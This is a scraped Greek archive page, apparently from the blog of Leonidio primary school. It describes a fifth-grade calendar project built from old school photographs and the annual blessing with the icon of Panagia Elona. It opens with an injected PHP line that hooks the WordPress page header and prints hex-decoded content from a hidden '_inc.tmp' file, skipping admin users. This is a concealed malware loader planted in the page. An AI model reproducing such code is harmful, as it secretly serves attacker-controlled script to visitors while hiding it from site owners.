if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Νοέμβριος, 2013 |

Monthly Archives: Νοέμβριος 2013

ΗΜΕΡΟΛΟΓΙΟ ΔΗΜΟΤΙΚΟΥ ΣΧΟΛΕΙΟΥ ΛΕΩΝΙΔΙΟΥ

Οι μαθητές της Ε΄τάξης με την καθοδήγηση των των Δασκάλων τους , Παπασαράντη Κων/νου και Ρουσάλη Ευγενίας πραγματοποιώντας το πρόγραμμα των σχολικών δραστηριοτήτων με θέμα”Δημιουργία Ημερολογίου 2014″ μας έφεραν στη μνήμη εικόνες του χθ

ες. Κάνοντας ανασκαφές στο παρελθόν, η σκαπάνη τους, έφερε στο φως φωτογραφικό υλικό του Σχολείου μας που ήταν θαμμένο σε συρτάρια και σκονισμένα άλμπουμ.

“Το Λεωνίδιο Εκπαιδεύεται”.

Μια ιστορική αναδρομή με φωτογραφικό υλικό από τα σχολικά θρανία έρχεται να θυμίσει σε όλους μας πώς ήταν η εκπαίδευση τα περασμένα χρόνια και πώς συνδέεται με το σήμερα. Παππούδες και γιαγιάδες στο ίδιο ημερολόγιο με τα παιδιά τους και τα εγγόνια τους. Δάσκαλοι του χθες και του σήμερα ανταμώνουν μέσα στις σελίδες του και σίγουρα μας ξαναφέρνουν στη μνήμη μας τόσες και τόσες γλυκές ιστορίες από τα παιδικά μας και σχολικά μας χρόνια!

Η ΕΙΚΟΝΑ ΤΗΣ ΠΑΝΑΓΙΑΣ ΤΗΣ ΕΛΩΝΑΣ ΣΤΟ ΣΧΟΛΕΙΟ ΜΑΣ

Όπως κάθε χρόνο, έτσι και φέτος η εικόνα της Παναγίας της Έλωνας μεταφέρθηκε από τους Ιερείς της περιοχής μας στο Σχολείο μας. Ακολούθησε Αγιασμός και  προσκύνημα της  εικόνας από εκπαιδευτικούς και μαθητές!